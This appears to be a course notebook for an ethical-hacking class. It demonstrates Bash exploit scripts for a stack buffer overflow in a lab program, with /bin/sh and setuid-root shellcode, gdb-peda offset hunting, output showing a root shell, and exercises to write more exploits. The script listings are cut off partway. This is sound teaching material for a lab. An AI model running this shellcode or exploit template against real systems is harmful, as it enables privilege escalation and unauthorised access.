# Exploit Code

- code/program that delivers payload is called exploit code
- helps delivers the shellcode code directly to the vulnerable program
    - over network, or locally using stdio or program argument, etc.
- you can create a exploitcode in Bash, Python, C/C++, etc. to send the payload to the vulnerable target program
- this notebook demonstrates how to create exploit code using Bash script

## Bash exploit code
- exploit code written in Bash script
- let's look at the `demos/stack_overflow/so_arg_exploit.sh` that exploits `so_arg.exe` program
- the script is all the steps put together when we went over exploiting with bash
- note that certain values such as buffer_address and offset may be different in different system 
    - use the exploit code as a template 
    - update buffer_address and offset as necessary
- let's first modify (if necessary) and run the exploit code

In [10]:
%%bash
input="demos/stack_overflow/so_arg.cpp"
output="so_arg.exe"

echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

In [11]:
! ./so_arg.exe "Hello There"

buffer is at 0xffffc2d0
buffer contains: 
Hello There
Good bye!


In [2]:
%%bash

cp demos/stack_overflow/so_arg_exploit.sh .
cat so_arg_exploit.sh

#!/bin/bash
#
# local exploit code using bash script
#

# Generate payload in the format: | NOP sled | shellcode | repeated return address |
# write each line of shellcode generated by PEDA to a file

# write the user-level shellcode to a file
shellcode_file_name="shellcode.bin"
echo -ne "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31" > $shellcode_file_name
echo -ne "\xc9\x89\xca\x6a\x0b\x58\xcd\x80" >> $shellcode_file_name

# vulnerable program to exploit
#########FIXME
target_program="so_arg.exe"
#########

######FIXME
offset=144 # EIP+0+4 or look for [ESP] --> offset ... in PEDA pattern search
######
#python3 -c 'print("A"*144, end="")' | ./$target_program

######FIXME
# feed buffer variable's address in Little Endian; reverse of what you see on screen
# can add a few bytes so you can land away from the beginning address
#printf "buffer_address: %x\n" $((0xffffc2c0 + 20))
buffer_address="\xc0\xc2\xff\xff"
########

wc -c shellcode.bin
shellcode_size=24 # find and 

### Update the exploit code

- update the target_program and git it a try

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ bash so_arg_exploit.sh 
24 shellcode.bin
NOP Sled size: 100 half-way: 50
payload ready and has size of  144 payload.bin
00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000060  90 90 90 90 31 c0 50 68  2f 2f 73 68 68 2f 62 69  |....1.Ph//shh/bi|
00000070  6e 89 e3 31 c9 89 ca 6a  0b 58 cd 80 c0 c2 ff ff  |n..1...j.X......|
00000080  c0 c2 ff ff c0 c2 ff ff  c0 c2 ff ff c0 c2 ff ff  |................|
00000090
sending the payload...
buffer is at 0xffffc2f0
buffer contains: 
����������������������������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
  X��������������������
so_arg_exploit.sh: line 58:  8569 Segmentation fault      ./$target_program $(cat $payload_file_name)

```

- find and update the offset using gdb-peda if necessary

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ gdb -q so_arg.exe                                                  Reading symbols from so_arg.exe...
```

- create cyclic pattern (long enough) 200 bytes as an argument and use it to run the program

```bash
gdb-peda$ pattern arg 200
Set 1 arguments to program

gdb-peda$ run

Starting program: /home/kali/EthicalHacking/so_arg.exe 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
buffer is at 0xffffc250
buffer contains: 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xf7fb2c00 --> 0xf7faf990 --> 0xf7ef71b0 (<_ZNSoD1Ev>:     push   ebx)
EBX: 0x6c414150 ('PAAl')
ECX: 0x6c0 
EDX: 0x8051bb0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
ESI: 0xf7de6000 --> 0x1e4d6c 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0x41514141 ('AAQA')
ESP: 0xffffc2e0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41416d41 ('AmAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41416d41
[------------------------------------stack-------------------------------------]
0000| 0xffffc2e0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0004| 0xffffc2e4 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0xffffc2e8 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0012| 0xffffc2ec ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0xffffc2f0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0020| 0xffffc2f4 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0xffffc2f8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0028| 0xffffc2fc ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41416d41 in ?? ()
```

- search the pattern in registers to find the offset

```bash

gdb-peda$ patts
Registers contain pattern buffer:
EBX+0 found at offset: 132
EBP+0 found at offset: 136
EIP+0 found at offset: 140
Registers point to pattern buffer:
[EDX] --> offset 0 - size ~203
[ESP] --> offset 144 - size ~56   <---- OFFSET WE NEED !!!!
Pattern buffer found at:
0x08051bb0 : offset    0 - size  200 ([heap])
0xf7c000cd : offset 33208 - size    4 (/usr/lib32/libm-2.31.so)
0xffffc250 : offset    0 - size  200 ($sp + -0x90 [-36 dwords])
0xffffc625 : offset    0 - size  200 ($sp + 0x345 [209 dwords])
References to pattern buffer found at:
0xf7de6d24 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d28 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d2c : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d30 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d34 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d38 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d3c : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xffffbbc4 : 0x08051bb0 ($sp + -0x71c [-455 dwords])
0xffffbbe8 : 0x08051bb0 ($sp + -0x6f8 [-446 dwords])
0xffffbc14 : 0x08051bb0 ($sp + -0x6cc [-435 dwords])
0xffffbc30 : 0x08051bb0 ($sp + -0x6b0 [-428 dwords])
0xffffbc34 : 0x08051bb0 ($sp + -0x6ac [-427 dwords])
0xffffbc44 : 0x08051bb0 ($sp + -0x69c [-423 dwords])
0xffffbc94 : 0x08051bb0 ($sp + -0x64c [-403 dwords])
0xffffc0d8 : 0x08051bb0 ($sp + -0x208 [-130 dwords])
0xffffc124 : 0x08051bb0 ($sp + -0x1bc [-111 dwords])
0xf7e62dcc : 0xffffc250 (/usr/lib32/libstdc++.so.6.0.28)
0xffffbd40 : 0xffffc250 ($sp + -0x5a0 [-360 dwords])
0xf7e650b7 : 0xffffc625 (/usr/lib32/libstdc++.so.6.0.28)
0xffffc3b8 : 0xffffc625 ($sp + 0xd8 [54 dwords])

```

- buffer address is conviniently printed (0xffffc2f0), everytime program is executed
- once the offset and return address are updated, run the exploit code

```bash

┌──(kali㉿K)-[~/EthicalHacking]
└─$ bash so_arg_exploit.sh
24 shellcode.bin
NOP Sled size: 100 half-way: 50
payload ready and has size of  144 payload.bin
00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000060  90 90 90 90 31 c0 50 68  2f 2f 73 68 68 2f 62 69  |....1.Ph//shh/bi|
00000070  6e 89 e3 31 c9 89 ca 6a  0b 58 cd 80 f0 c2 ff ff  |n..1...j.X......|
00000080  f0 c2 ff ff f0 c2 ff ff  f0 c2 ff ff f0 c2 ff ff  |................|
00000090
sending the payload...
buffer is at 0xffffc2f0
buffer contains: 
����������������������������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
  X��������������������
$ whoami
kali
$ date
Thu Dec 17 08:53:37 MST 2020
$ exit

```

## Bash setuid exploit
- very similar to the bash exploit above
- main difference is that this exploit uses root shellcode

### set root setuid on the target program
- root setuid let's the program run as root and access privileded files and commands

In [12]:
! ls -al so_arg.exe

-rwxr-xr-x 1 root root 33308 Dec 17 10:12 so_arg.exe


In [8]:
! echo kali | sudo -S chown root:root so_arg.exe

[sudo] password for kali: 

In [13]:
! echo kali | sudo -S chmod +s so_arg.exe

[sudo] password for kali: 

In [14]:
! ls -al so_arg.exe
# notice the s

-rwsr-sr-x 1 root root 33308 Dec 17 10:12 so_arg.exe


In [15]:
! cp ./demos/stack_overflow/so_arg_exploit_setuid.sh .

In [16]:
! cat so_arg_exploit_setuid.sh

#!/bin/bash
#
# Template for local interactive exploit code using bash script
#

# Generate payload file in the format: | NOP sled | shellcode | repeated return address |
# write each line of shellcode generated by PEDA to a file

# write shellcode to a file
shellcode_file_name="shellcode.bin"

echo -ne "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" > $shellcode_file_name
echo -ne "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" >> $shellcode_file_name
echo -ne "\xe1\xcd\x80" >> $shellcode_file_name
wc -c shellcode.bin

# vulnerable program to exploit
######FXIME
target_program="stack_overflow_arg.exe"
offset=144 # EIP+0+4 or look for [ESP] --> offset ... in PEDA pattern search
#######

#python3 -c 'print("A"*144, end="")' | ./$target_program

######FIXME
# feed buffer variable's address in Little Endian; reverse of what you see on screen
# can add a few bytes so you can land away from the beginning address
#printf "buffer_address: %x\n" $((0xffffc

### Update and run the exploit
- update the target_program, offset and return address
- update the target program and do a dry run

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ bash so_arg_exploit_setuid.sh                                                                              139 ⨯
35 shellcode.bin
NOP Sled size: 89 half-way: 44
payload ready and has size of  144 payload.bin
00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000050  90 90 90 90 90 90 90 90  90 31 c0 31 db 31 c9 99  |.........1.1.1..|
00000060  b0 a4 cd 80 6a 0b 58 51  68 2f 2f 73 68 68 2f 62  |....j.XQh//shh/b|
00000070  69 6e 89 e3 51 89 e2 53  89 e1 cd 80 c0 c0 ff ff  |in..Q..S........|
00000080  c0 c0 ff ff c0 c0 ff ff  c0 c0 ff ff c0 c0 ff ff  |................|
00000090
sending the payload...
buffer is at 0xffffc2f0
buffer contains: 
�����������������������������������������������������������������������������������������1�1�1ə��j
                                                                                                  XQh//shh/bin��Q��S����������������������
so_arg_exploit_setuid.sh: line 62:  9572 Segmentation fault      ./$target_program $(cat $payload_file_name)
```

- update the return address, update offset if necessary

```
┌──(kali㉿K)-[~/EthicalHacking]
└─$ bash so_arg_exploit_setuid.sh                                                                              139 ⨯
35 shellcode.bin
NOP Sled size: 89 half-way: 44
payload ready and has size of  144 payload.bin
00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000050  90 90 90 90 90 90 90 90  90 31 c0 31 db 31 c9 99  |.........1.1.1..|
00000060  b0 a4 cd 80 6a 0b 58 51  68 2f 2f 73 68 68 2f 62  |....j.XQh//shh/b|
00000070  69 6e 89 e3 51 89 e2 53  89 e1 cd 80 f0 c2 ff ff  |in..Q..S........|
00000080  f0 c2 ff ff f0 c2 ff ff  f0 c2 ff ff f0 c2 ff ff  |................|
00000090
sending the payload...
buffer is at 0xffffc2f0
buffer contains: 
�����������������������������������������������������������������������������������������1�1�1ə��j
                                                                                                  XQh//shh/bin��Q��S����������������������
# whoami
root
# id  
uid=0(root) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),133(scanner),141(kaboxer)
# exit
```

- we get a root shell; meaning you're now logged in as a root
- attackers can inflict a lot more damage with the root priviledge

## Challenge

1. write exploit code for the target program `demos/stack_overflow/so_stdio.cpp` using Bash script
    - target program when exploited gives user shell
    - test to make sure the exploit code works
    
    
2. write exploit code for the target program `demos/stack_overflow/so_stdio.cpp` using Bash script
    - target program when exploited gives root shell
    - test to make sure the exploit code works